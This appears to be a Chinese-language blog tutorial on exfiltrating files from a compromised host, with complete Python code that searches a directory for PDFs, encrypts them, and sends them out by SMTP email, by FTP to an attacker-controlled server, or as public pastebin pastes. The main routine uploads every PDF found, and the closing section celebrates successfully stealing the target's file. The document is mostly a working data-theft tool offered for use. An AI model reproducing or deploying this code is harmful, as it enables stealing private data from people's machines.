描述
- 入侵到目标主机后,发现有趣的文件,将其加密后,通过ftp文件\邮件\第三方网站的方式将密文传输到自己的机子上,在本地还原数据文件
利用邮件传输
# smtp
smtp_server = 'smtp.163.com'   # submission host; plain_email opens its STARTTLS session here
smtp_port = 587                # SMTP submission port
smtp_acct = 'test@163.com'     # sender address, also used as the login name
smtp_password = '123456'       # plaintext credential embedded in source; present in every copy of this file
tgt_accts = ['tim@163.com']    # recipient list; its repr is what plain_email puts on the To: line
def plain_email(subject, contents):
    """Send *contents* (bytes, decoded as text) to every address in tgt_accts.

    The message is assembled by hand rather than via email.message: a
    Subject line, a "From" line (note: no colon, so it is not a well-formed
    header — kept as in the original), the repr of tgt_accts on the To:
    line, then the decoded body. It is submitted over SMTP with STARTTLS,
    authenticating with the module-level smtp_acct / smtp_password, and the
    session is closed after a one-second pause.

    Args:
        subject: text for the Subject line.
        contents: bytes; must decode with the default codec or this raises
            UnicodeDecodeError before any connection is made.
    """
    header_lines = [
        f"Subject: {subject}",
        f"From {smtp_acct}",
        f"To: {tgt_accts}",
    ]
    body = contents.decode()
    message = "\n".join(header_lines) + f"\n\n{body}"

    session = smtplib.SMTP(smtp_server, smtp_port)
    session.starttls()
    session.login(smtp_acct, smtp_password)
    session.sendmail(smtp_acct, tgt_accts, message)
    time.sleep(1)
    session.quit()
利用ftp文件传输
#ftp
ftp_srv = '192.168.43.126'  # FTP host (private-range address); default target of plain_ftp
ftp_usr = 'z5onk0'          # FTP login name
ftp_pwd = 'aaaaaa'          # FTP password; plain FTP sends it in cleartext
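def plain_ftp(docpath, server=ftp_srv):
    """Upload the file at *docpath* to *server* over plain FTP.

    Logs in with the module-level ftp_usr / ftp_pwd, changes to a fixed
    remote directory and stores the file under its basename. Plain FTP
    carries both the credentials and the payload unencrypted, so the whole
    exchange is visible to anyone watching the wire.

    Args:
        docpath: local path of the file to upload.
        server: FTP host; defaults to ftp_srv.

    Raises:
        ftplib.all_errors members on login/transfer failure; OSError if
        docpath cannot be opened.
    """
    ftp = ftplib.FTP(server)
    ftp.login(ftp_usr, ftp_pwd)
    ftp.cwd('/home/test')
    # Open under a context manager so the local handle is closed even if the
    # transfer raises; the original relied on garbage collection to close it.
    with open(docpath, "rb") as fh:
        ftp.storbinary("STOR " + os.path.basename(docpath), fh, 1024)
    ftp.quit()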
利用第三方网站pastebin传输
- 需要先注册账号,注册后会分配一个 api_dev_key
# web server
username = "z5onk0"   # pastebin account name
password = 'aaaaaa'   # pastebin account password, stored in plaintext in source
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'  # per-account developer key; sent with both API calls in plain_paste
def plain_paste(title, content):
    """Create a public pastebin paste named *title* holding *content* as text.

    Two POSTs: the first trades the module-level username / password /
    api_dev_key for a user key, the second creates the paste. The body of
    the first response is used verbatim as the user key — there is no
    status check, so an error message would simply be forwarded as the
    key. The status code and body of the second response are printed.

    Args:
        title: paste name.
        content: bytes; must decode with the default codec.
    """
    credentials = {
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    login_reply = requests.post(
        'https://pastebin.com/api/api_login.php', data=credentials
    )
    user_key = login_reply.text

    paste_fields = {
        'api_paste_name': title,
        'api_paste_code': content.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    post_reply = requests.post(
        'https://pastebin.com/api/api_post.php', data=paste_fields
    )
    print(post_reply.status_code)
    print(post_reply.text)
方法调度
- 遍历目标目录,找到某一后缀名的文件,yield返回文件路径
- 通过字典调度实现传输方法的调用:传入要选择的函数名,即可调用该函数,python函数是一等公民!
- 调用上一篇的encrypt函数对文件内容加密
#select way
# Dispatch table: method name -> sender. 'ftp' takes a file path; 'email'
# and 'web' take (title, bytes). dataleak relies on that split.
WAY = dict(
    email=plain_email,
    ftp=plain_ftp,
    web=plain_paste,
)
def find_files(direcory, doc_type='.pdf'):
    """Yield the path of each file under *direcory* whose name ends with *doc_type*.

    Walks the tree top-down with os.walk (symlinked directories are not
    followed). The match is a plain, case-sensitive suffix test.

    Args:
        direcory: root directory to walk (name kept as in the original).
        doc_type: filename suffix to match, default '.pdf'.
    """
    for root, _subdirs, names in os.walk(direcory):
        wanted = (name for name in names if name.endswith(doc_type))
        for name in wanted:
            yield os.path.join(root, name)
def dataleak(ori_path, method):
    """Read *ori_path*, run it through encrypt(), and pass it to WAY[method].

    The 'ftp' sender takes a path, so the encrypt() output is staged in a
    file under c:\\windows\\temp named after the original basename and
    removed once the upload returns. Every other sender is called with
    (basename, encrypted bytes). What encrypt() produces is not visible
    here — it is imported from a sibling module.

    Raises:
        KeyError if method is not a key of WAY (after the file has already
        been read and encrypted).
    """
    with open(ori_path, 'rb') as source:
        payload = encrypt(source.read())
    basename = os.path.basename(ori_path)

    if method != 'ftp':
        WAY[method](basename, payload)
        return

    staging = f'c:\\windows\\temp\\{basename}'
    with open(staging, 'wb') as sink:
        sink.write(payload)
    WAY[method](staging)
    os.unlink(staging)
完整代码
import ftplib
import os
import smtplib
import time
from encrypt import encrypt, decrypt
import requests
# smtp
smtp_server = 'smtp.163.com'   # submission host; plain_email opens its STARTTLS session here
smtp_port = 587                # SMTP submission port
smtp_acct = 'test@163.com'     # sender address, also used as the login name
smtp_password = '123456'       # plaintext credential embedded in source; present in every copy of this file
tgt_accts = ['tim@163.com']    # recipient list; its repr is what plain_email puts on the To: line
def plain_email(subject, contents):
    """Send *contents* (bytes, decoded as text) to every address in tgt_accts.

    The message is assembled by hand rather than via email.message: a
    Subject line, a "From" line (note: no colon, so it is not a well-formed
    header — kept as in the original), the repr of tgt_accts on the To:
    line, then the decoded body. It is submitted over SMTP with STARTTLS,
    authenticating with the module-level smtp_acct / smtp_password, and the
    session is closed after a one-second pause.

    Args:
        subject: text for the Subject line.
        contents: bytes; must decode with the default codec or this raises
            UnicodeDecodeError before any connection is made.
    """
    header_lines = [
        f"Subject: {subject}",
        f"From {smtp_acct}",
        f"To: {tgt_accts}",
    ]
    body = contents.decode()
    message = "\n".join(header_lines) + f"\n\n{body}"

    session = smtplib.SMTP(smtp_server, smtp_port)
    session.starttls()
    session.login(smtp_acct, smtp_password)
    session.sendmail(smtp_acct, tgt_accts, message)
    time.sleep(1)
    session.quit()
#ftp
ftp_srv = '192.168.43.126'  # FTP host (private-range address); default target of plain_ftp
ftp_usr = 'z5onk0'          # FTP login name
ftp_pwd = 'aaaaaa'          # FTP password; plain FTP sends it in cleartext
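def plain_ftp(docpath, server=ftp_srv):
    """Upload the file at *docpath* to *server* over plain FTP.

    Logs in with the module-level ftp_usr / ftp_pwd, changes to a fixed
    remote directory and stores the file under its basename. Plain FTP
    carries both the credentials and the payload unencrypted, so the whole
    exchange is visible to anyone watching the wire.

    Args:
        docpath: local path of the file to upload.
        server: FTP host; defaults to ftp_srv.

    Raises:
        ftplib.all_errors members on login/transfer failure; OSError if
        docpath cannot be opened.
    """
    ftp = ftplib.FTP(server)
    ftp.login(ftp_usr, ftp_pwd)
    ftp.cwd('/home/dfl')
    # Open under a context manager so the local handle is closed even if the
    # transfer raises; the original relied on garbage collection to close it.
    with open(docpath, "rb") as fh:
        ftp.storbinary("STOR " + os.path.basename(docpath), fh, 1024)
    ftp.quit()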
# web server
username = "z5onk0"   # pastebin account name
password = 'aaaaaa'   # pastebin account password, stored in plaintext in source
api_dev_key = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'  # per-account developer key; sent with both API calls in plain_paste
def plain_paste(title, content):
    """Create a public pastebin paste named *title* holding *content* as text.

    Two POSTs: the first trades the module-level username / password /
    api_dev_key for a user key, the second creates the paste. The body of
    the first response is used verbatim as the user key — there is no
    status check, so an error message would simply be forwarded as the
    key. The status code and body of the second response are printed.

    Args:
        title: paste name.
        content: bytes; must decode with the default codec.
    """
    credentials = {
        'api_dev_key': api_dev_key,
        'api_user_name': username,
        'api_user_password': password,
    }
    login_reply = requests.post(
        'https://pastebin.com/api/api_login.php', data=credentials
    )
    user_key = login_reply.text

    paste_fields = {
        'api_paste_name': title,
        'api_paste_code': content.decode(),
        'api_dev_key': api_dev_key,
        'api_user_key': user_key,
        'api_option': 'paste',
        'api_paste_private': 0,
    }
    post_reply = requests.post(
        'https://pastebin.com/api/api_post.php', data=paste_fields
    )
    print(post_reply.status_code)
    print(post_reply.text)
#select way
# Dispatch table: method name -> sender. 'ftp' takes a file path; 'email'
# and 'web' take (title, bytes). dataleak relies on that split.
WAY = dict(
    email=plain_email,
    ftp=plain_ftp,
    web=plain_paste,
)
def find_files(direcory, doc_type='.pdf'):
    """Yield the path of each file under *direcory* whose name ends with *doc_type*.

    Walks the tree top-down with os.walk (symlinked directories are not
    followed). The match is a plain, case-sensitive suffix test.

    Args:
        direcory: root directory to walk (name kept as in the original).
        doc_type: filename suffix to match, default '.pdf'.
    """
    for root, _subdirs, names in os.walk(direcory):
        wanted = (name for name in names if name.endswith(doc_type))
        for name in wanted:
            yield os.path.join(root, name)
def dataleak(ori_path, method):
    """Read *ori_path*, run it through encrypt(), and pass it to WAY[method].

    The 'ftp' sender takes a path, so the encrypt() output is staged in a
    file under c:\\windows\\temp named after the original basename and
    removed once the upload returns. Every other sender is called with
    (basename, encrypted bytes). What encrypt() produces is not visible
    here — it is imported from a sibling module.

    Raises:
        KeyError if method is not a key of WAY (after the file has already
        been read and encrypted).
    """
    with open(ori_path, 'rb') as source:
        payload = encrypt(source.read())
    basename = os.path.basename(ori_path)

    if method != 'ftp':
        WAY[method](basename, payload)
        return

    staging = f'c:\\windows\\temp\\{basename}'
    with open(staging, 'wb') as sink:
        sink.write(payload)
    WAY[method](staging)
    os.unlink(staging)
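if __name__ == "__main__":
    # Entry point: walk the current working directory and pass every file
    # find_files yields (default suffix '.pdf') to dataleak with the 'ftp'
    # method. Local names renamed so they no longer shadow the dir() builtin.
    target_dir = os.getcwd()
    for pdf_path in find_files(target_dir):
        dataleak(pdf_path, 'ftp')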
结果
- 选择paste方式传输,生成pastebin的网址
- 进入网址,看到已经上传的密文
- 用上一篇的decrypt函数进行解密,并写入到pdf文件中。下图中,左边pdf是目标机器上的原文件,右边pdf是传输到本地机器上还原后的文件,成功偷取目标文件!